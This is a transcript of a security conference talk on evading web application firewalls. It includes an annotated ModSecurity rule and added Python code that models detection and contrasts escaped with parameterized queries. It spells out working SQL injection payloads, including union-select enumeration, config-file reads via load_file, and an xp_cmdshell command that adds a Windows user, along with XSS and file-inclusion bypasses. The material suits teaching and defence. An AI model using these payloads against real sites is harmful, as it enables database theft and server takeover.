
Web Application Firewall: Suckseed or Succeed



Breach WAF with advanced techniques


  1. Web Application Firewall (WAF): Suckseed or Succeed !? Mr. Prathan Phongthiproek, Consulting Manager, Red Team, ACIS Professional Center
  2. Who am I?
     - ACIS Professional Center: Manager of the Red Team, specializing in Attack & Penetration
     - Information Security Consulting Manager
     - Instructor and Speaker
     - Founder of CWH Underground
     - Hacker aka 0x7a657133756c
  3. Let's Reveal (agenda)
     - Introduction to Web Application Firewall (WAF)
     - Breach it !!: Filter Evasion, HTTP Parameter Contamination, HTTP Pollution: Split and Join
     - Conclusion
  4. Introduction to Web Application Firewall (WAF)
  5. Web Application Hacking
     - 7 of 10 sites are vulnerable
     - 70% of cyber attacks are on web ports
     - 95% of companies are hacked through web ports
     - Anonymous and LulzSec hackers with Operation #AntiSec
  6. Web Application Hacking: Top 3 Web App Attacks
     - Cross Site Scripting
     - File Inclusion (Remote/Local)
     - SQL Injection (Normal/Blind/Time based/Regex...)
  7. Misunderstanding of how to harden a web application
  8. What's a WAF?
     - Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks
     - Usually contains a lot of complex reg-exp rules to match (blacklist)
     - For most WAF vendors the rules are "closely guarded secrets"
     - Open-source WAFs (Mod_security and PHPIDS) have open-source rules
  9. Understand Blacklist
  10. Detection and Protection: SQL Injection, Cross Site Scripting, Local and Remote File Inclusion, Code/Command Injection, Directory Traversal, Buffer Overflow, Cookie Poisoning, Parameter Tampering, Upload File Mis-Handling, Information Disclosure, etc.
  11. WAF Vendors: Armorize, Barracuda, Cisco ACE, Citrix Netscaler, F5, Imperva SecureSphere, Radware Appwall, Profense, Bee-ware, BinarySec, Mod Security, WebKnight, DenyAll, Fortify, Visonys, Pentasecurity, other...
  12. WAF implementation
  13. Breach it !! (CMS and WAFs) "We've got it under control... under con... it's already broken"
  14. Filter Evasion (SQLi): PHP with Magic_quote On, mysql_real_escape_string or addslashes turns ' and " into \' and \"
      - `id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'`
  15. Filter Evasion (SQLi): PHP with Magic_quote On, mysql_real_escape_string or addslashes; the quoted string is replaced by a hex literal, so there is no quote to escape
      - `id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273`
  16. Filter Evasion (SQLi): PHP with Magic_quote On, mysql_real_escape_string or addslashes; string to ASCII
      - `id=1 and 1=2 union select 1,load_file(CHAR(47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))` (the CHAR() list spells /var/www/html/config/config.inc.php)
  17. Filter Evasion (SQLi)
      - Comments: //, --, /**/, /*, #, %00, e.g. `id=1+un/**/ion+se/**/lect+1,2,3--`
      - Case changing against a lower-case-only rule such as `/union\sselect/g`: `id=1+UnIoN/**/SeLecT/**/1,2,3--`
      - Replaced keywords (the filter removes one occurrence of the keyword): `id=1+UnunionIoN+SeselectLecT+1,2,3--`
  18. Filter Evasion (SQLi), case study: NukeSentinel (PHP Nuke), encode to hex
      - Forbidden: `**/union/**/select.......`
      - Bypass: `**%2Funion%2F**%2Fselect.......`
  19. Filter Evasion (SQLi): Buffer overflow (for WAFs written in C)
      - `id=1+and+(select 1)=(Select 0x41414141414141414141414141414141.....)+UnIoN+SeLecT+1,version(),3,database(),user(),6,7,8,9,10--`
  20. Filter Evasion (SQLi): Inline comments (/*!......*/)
      - A lot of WAFs were bypassed; bypasses IPS and timeouts as well
      - MySQL only (comments.html)
      - Rule `/union\sselect/ig` vs. `id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*! TaBlE_sChEMa*/+like+database()--`
  21. Filter Evasion (SQLi): Inline comments (/*!......*/)
  22. Filter Evasion (SQLi): Censor
  23. Filter Evasion (SQLi), other bypasses
      - and -> &&
      - or -> ||
      - = -> like
      - substring() -> substr(), mid(), strcmp()
      - ascii() -> hex(), bin(), char(), ord()
      - benchmark() -> sleep()
      - Whitespace -> (), /**/, %0b
      - isnull, between
  24. Filter Evasion (SQLi), case study: PHPIDS
  25. Filter Evasion (SQLi), case study: PHPIDS
  26. Filter Evasion (SQLi), case study: PHPIDS
  27. Filter Evasion (SQLi), case study: Mod Security CRS
      `SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" "phase:2,rev:2.2.1,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:959047,tag:WEB_ATTACK/SQL_INJECTION,tag:WASCTC/WASC-19,tag:OWASP_TOP_10/A1,tag:OWASP_AppSensor/CIE1,tag:PCI/6.5.2,logdata:%{TX.0},severity:2,setvar:tx.msg=%{rule.msg},setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"`
  28. Filter Evasion (SQLi), case study: Mod Security CRS
      - As sent (URL-encoded): `*%2F*bar%0D%0Aselect %23foo%0D%0A1%2C2%2Ccurrent_user`
      - Decoded: `0 div 1 union#foo*/*bar\r\nselect#foo\r\n1,2,current_user`
      - What MySQL executes: `0 div 1 union select 1,2,current_user`
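The payloads on slides 17, 20 and 28 get past the CRS rule above for one shared reason: the rule's own transformation chain (t:replaceComments in particular) discards the very text MySQL goes on to execute, so the regex is run over a string the database never sees. The Python below is an added example, not code from the presentation or from ModSecurity: it emulates the rule's transformation chain next to a normaliser that follows MySQL's comment rules (conditional `/*!...*/` bodies kept, `#` and `-- ` line comments resolved left to right), then applies the rule's regex to both. The regex and the three parameter values come from the slides; the function names, the `SAMPLES` labels and the simplified emulation of `urlDecodeUni`/`replaceComments` are my assumptions.

```python
import re
from urllib.parse import unquote_plus

# Regex from the slides' ModSecurity CRS case study (rule 959047): "union"
# followed within 100 characters by "select", both word-bounded.
UNION_SELECT = re.compile(r"\bunion\b.{1,100}?\bselect\b")


def crs_style_normalize(value: str) -> str:
    """Emulates the transformation chain listed in the page's CRS rule:
    urlDecodeUni, lowercase, replaceComments, compressWhiteSpace.
    replaceComments turns every /*...*/ (and an unterminated /*) into one
    space, which is exactly what deletes the keywords hidden in /*!...*/."""
    v = unquote_plus(value).lower()
    v = re.sub(r"/\*.*?\*/|/\*.*$", " ", v, flags=re.DOTALL)
    return re.sub(r"\s+", " ", v).strip()


def mysql_style_normalize(value: str) -> str:
    """Reduces the value to what MySQL's lexer would actually execute, scanning
    left to right so '#' line comments and /*...*/ block comments are resolved
    in the order the engine meets them:
      /*!...*/        -> body kept (MySQL executes conditional comments)
      /*...*/         -> one space
      # ... / -- ...  -> dropped up to end of line (or end of input)"""
    sql = unquote_plus(value)
    out, i, n = [], 0, len(sql)
    while i < n:
        if sql.startswith("/*!", i):
            end = sql.find("*/", i + 3)
            body = sql[i + 3:n if end == -1 else end]
            body = re.sub(r"^\d{5}", "", body)   # optional version tag, e.g. /*!50000 ... */
            out.append(" " + body + " ")
            i = n if end == -1 else end + 2
        elif sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            out.append(" ")
            i = n if end == -1 else end + 2
        elif sql[i] == "#" or (sql.startswith("--", i) and (i + 2 == n or sql[i + 2].isspace())):
            end = sql.find("\n", i)
            out.append(" ")
            i = n if end == -1 else end + 1
        else:
            out.append(sql[i])
            i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip().lower()


def crs_style_match(value: str) -> bool:
    """The page's rule as written: regex over the CRS-transformed value."""
    return bool(UNION_SELECT.search(crs_style_normalize(value)))


def engine_aware_match(value: str) -> bool:
    """Same regex, but over the value as the database engine would parse it."""
    return bool(UNION_SELECT.search(mysql_style_normalize(value)))


# Parameter values taken from the slides (URL-decoded, %0D%0A written as \r\n).
SAMPLES = {
    "slide17_case_and_comment": "1+UnIoN/**/SeLecT/**/1,2,3--",
    "slide20_inline_comments": "1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)"
                               "+FrOm/*!information_schema*/.tables/*!WhErE*/+/*! TaBlE_sChEMa*/+like+database()--",
    "slide28_crs_bypass": "0 div 1 union#foo*/*bar\r\nselect#foo\r\n1,2,current_user",
}


def compare() -> dict:
    """Returns {sample: (crs_style_hit, engine_aware_hit)} for each page payload."""
    return {name: (crs_style_match(v), engine_aware_match(v)) for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (crs, engine) in compare().items():
        print(f"{name:26s} CRS-style: {str(crs):5s} engine-aware: {engine}")
```

Only the slide 17 payload is caught by the rule as written; slides 20 and 28 survive because the comment stripping runs before the keyword match and removes the keyword (slide 20) or everything after the first unterminated `/*` (slide 28). The detection-side lesson is that normalisation has to follow the grammar of the backend the WAF fronts, not a generic notion of "comment".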
  29. Filter Evasion: Cross Site Scripting (XSS) and File Inclusion
      - XSS forbidden: [markup lost in extraction]; bypass: `html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=` (data: URI, leading part lost in extraction)
      - File inclusion forbidden: [path lost in extraction]; bypass: [path lost in extraction] `passwd`
  30. HTTP Parameter Contamination
  31. HTTP Parameter Contamination
      - Bypass Mod_Security SQLi rule (modsecurity_crs_41)
      - Bypass URLScan 3.1 DenyQueryStringSequences rules
      - Bypass AQTRONIX WebKnight WAF with "%"
  32. HTTP Parameter Contamination, case study: AQTRONIX WebKnight
      - `an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)`
      - `10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)`
      - `10 and 1=0/(select top 1 table_name from information_schema.tables)`
  33. HTTP Pollution: Split and Join
      - HPP is a quite simple but effective hacking technique
      - HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string
      - Focus on ASP/
      - A lot of WAFs were bypassed
  34. HTTP Pollution: Split and Join
  35. HTTP Pollution: Split and Join
  36. HTTP Pollution: Split and Join
  37. HTTP Pollution: Split and Join, basic attack
      - Forbidden: `name,password from user`
      - Bypass: `name&q=password from user`
      - Split: `q=select name` and `q=password from user`
      - Joined: `q=select name,password from user`
  38. HTTP Pollution: Split and Join, HPP + inline comment (bypass commercial WAF)
      - Forbidden: `name,password from user`
      - Bypass: `*&q=*/name&q=password/*&q=*/ from/*&q=*/user`
      - Split: `q=select/*`, `q=*/name`, `q=password/*`, `q=*/from/*`, `q=*/user`
      - Joined: `q=select/*,*/name,password/*,*/from/*,*/user`
      - After comment removal: `q=select name,password from user`
  39. HTTP Pollution: Split and Join
  40. HTTP Pollution: Split and Join, case study: IBM Web Application Firewall (2011-6-21)
      - Forbidden: `; EXEC master..xp_cmdshell "net user lucifer UrWaFisShiT /add" --`
      - Bypass: `; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ "net user lucifer UrWaFisShiT" /*&id=1*/ --`
      - Split: `id=1'; /*`, `id=1*/ EXEC /*`, `id=1*/ master..xp_cmdshell /*`, `id=1*/ "net user lucifer UrWaFisShiT" /*`, `id=1*/ --`
      - Joined: `id=1'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "net user lucifer UrWaFisShiT" /*,1*/ --`
      - After comment removal: `id=1'; EXEC master..xp_cmdshell "net user lucifer UrWaFisShiT" --`
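Every split-and-join payload on slides 37 to 40 works against the same inspection model: the WAF looks at each occurrence of `q` (or `id`) on its own, while the application receives one string the framework has already glued together. The Python below is an added example, not code from the presentation: it rebuilds the server-side view of a query string for a given framework before matching, so the joined (and then comment-stripped) value is what gets inspected. The join behaviours in `JOIN_RULES` (ASP.NET concatenates duplicate values with a comma, classic ASP with a comma and a space, PHP keeps the last value) and the `select ... from` rule are my assumptions for the example; the two query strings are reconstructed from the split lists on slides 37 and 38.

```python
import re
from urllib.parse import parse_qsl

# How a few server stacks present duplicate query parameters to the application
# (assumed behaviour table for this example, keyed by labels I chose):
#   asp.net -> Request.QueryString["q"] returns all values joined by ","
#   asp     -> classic ASP joins them with ", "
#   php     -> $_GET["q"] holds the last value only
JOIN_RULES = {
    "asp.net": lambda values: ",".join(values),
    "asp": lambda values: ", ".join(values),
    "php": lambda values: values[-1],
}

# Detection rule for this example: a SELECT with a FROM within 100 characters.
SELECT_FROM = re.compile(r"\bselect\b.{1,100}?\bfrom\b", re.IGNORECASE | re.DOTALL)


def strip_block_comments(sql: str) -> str:
    """Collapses /*...*/ comments to a space, as the SQL engine will once the
    joined value reaches it (this is what turns slide 38's fragments into SQL)."""
    return re.sub(r"/\*.*?\*/", " ", sql, flags=re.DOTALL)


def server_view(query: str, framework: str) -> dict:
    """Rebuilds the parameter -> value mapping the application will see, i.e.
    after the framework has merged duplicate parameter names."""
    groups = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        groups.setdefault(name, []).append(value)
    join = JOIN_RULES[framework]
    return {name: join(values) for name, values in groups.items()}


def effective_sql(query: str, framework: str, name: str) -> str:
    """The fragment the database parses for one parameter: joined, comment-stripped,
    whitespace collapsed."""
    joined = server_view(query, framework)[name]
    return re.sub(r"\s+", " ", strip_block_comments(joined)).strip()


def per_parameter_match(query: str) -> bool:
    """Naive WAF model: every occurrence of a parameter is inspected on its own."""
    return any(SELECT_FROM.search(value) for _, value in parse_qsl(query, keep_blank_values=True))


def joined_match(query: str, framework: str) -> bool:
    """Framework-aware model: inspect the merged, comment-stripped value."""
    return any(SELECT_FROM.search(strip_block_comments(value))
               for value in server_view(query, framework).values())


# Query strings reconstructed from the split lists on slides 37 and 38.
BASIC_SPLIT = "q=select name&q=password from user"
COMMENT_SPLIT = "q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user"

if __name__ == "__main__":
    for query in (BASIC_SPLIT, COMMENT_SPLIT):
        print(query)
        print("  per-parameter match:", per_parameter_match(query))
        for fw in JOIN_RULES:
            print(f"  {fw:7s} sees {effective_sql(query, fw, 'q')!r} -> match {joined_match(query, fw)}")
```

Per-parameter inspection reports nothing for either query, while the ASP.NET and classic ASP views both reduce to `select name,password from user` and match. The PHP view keeps only the last fragment and stays clean, which is also why the slides single out ASP: the technique depends on the framework doing the joining. A WAF that cannot be told which framework sits behind it has to inspect every plausible join of duplicate parameters, not just each value.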
  41. "Thailand needs change. It is time for everyone in the country to wake up; ignorance must come to an end."
  42. How to protect your website?
      - Implement a Secure Software Development Life Cycle (SSDLC)
      - Secure coding: validate all inputs and outputs
      - Pentest before going online
      - Harden it !!
      - Re-visit again
      - Deploy a WAF (optional)
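"Validate all inputs and outputs" on slide 42 is the fix that slides 14 to 16 show quote escaping cannot deliver: the injected value sits in a numeric context where no quote is needed, and CHAR() rebuilds any string the escaping was meant to block. The SQLite example below is added here and is not the author's code; it puts the three handlers side by side on a constructed schema, with the slide 14 to 16 payload translated to SQLite (`pragma_table_info()` standing in for `information_schema.columns`, `char(117,115,101,114,115)` spelling `users`). Table names, the `news` lookup and the function names are my assumptions.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed toy schema: a public 'news' table the page is meant to read
    from, and a 'users' table whose column names the payload goes after."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'hello');
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return conn


def escape_quotes(value: str) -> str:
    """All that addslashes / mysql_real_escape_string-style filtering does for
    this query: neutralise quote characters (SQLite doubles them)."""
    return value.replace("'", "''")


def lookup_escaped(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable: escaping only. The value lands in a numeric context, so the
    payload contains no quote at all and the escaping has nothing to act on."""
    sql = "SELECT id, title FROM news WHERE id=" + escape_quotes(user_id)
    return conn.execute(sql).fetchall()


def is_valid_id(value: str) -> bool:
    """Input validation (slide 42): an id is a non-empty string of digits, nothing else."""
    return value.isdigit()


def lookup_validated(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened by validation: anything that is not an integer is rejected before
    it gets near SQL, and the accepted integer is still passed as a parameter."""
    if not is_valid_id(user_id):
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id, title FROM news WHERE id=?", (int(user_id),)).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened by a bound parameter: the value is data, never part of the statement."""
    return conn.execute("SELECT id, title FROM news WHERE id=?", (user_id,)).fetchall()


# Slides 14-16 payload in SQLite dialect (constructed): no quote anywhere, the
# table name is rebuilt from ASCII codes exactly as slide 16 does with CHAR().
PAYLOAD = ("1 and 1=2 union select 1,group_concat(name) "
           "from pragma_table_info(char(117,115,101,114,115))")

if __name__ == "__main__":
    conn = build_db()
    print("escaping only :", lookup_escaped(conn, PAYLOAD))        # leaks the column list of users
    print("parameterized :", lookup_parameterized(conn, PAYLOAD))  # []
    print("validated     :", "rejected" if not is_valid_id(PAYLOAD) else lookup_validated(conn, PAYLOAD))
```

The escaped handler returns the column names of `users`, the parameterized handler returns nothing for the payload and still finds row 1 for a plain `"1"`, and the validating handler never lets the payload reach the database. Escaping is a last resort for string contexts; for everything else the slide's advice (validate, and bind) is the control that actually holds.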
  43. Conclusion
      - WAF is not the long-expected fix: because of its functional limitations, a WAF is not able to protect a web app from all possible vulnerabilities
      - It is necessary to adapt the WAF filters to the particular web app being protected
      - A WAF doesn't eliminate a vulnerability, it just partly screens the attack vector
      - Is it suckseed or succeed !? "Security products are not able to protect 100% from the damn config/coding of admins. You just need time and imagination to breach it !!"
  44. Greetz to: ACIS Red Team, Kyle, Johannes Dahse, Ahmad Maulana, Luca Carettoni, Stefano di Paola, Ivan Markovic, and all WAF products that I breached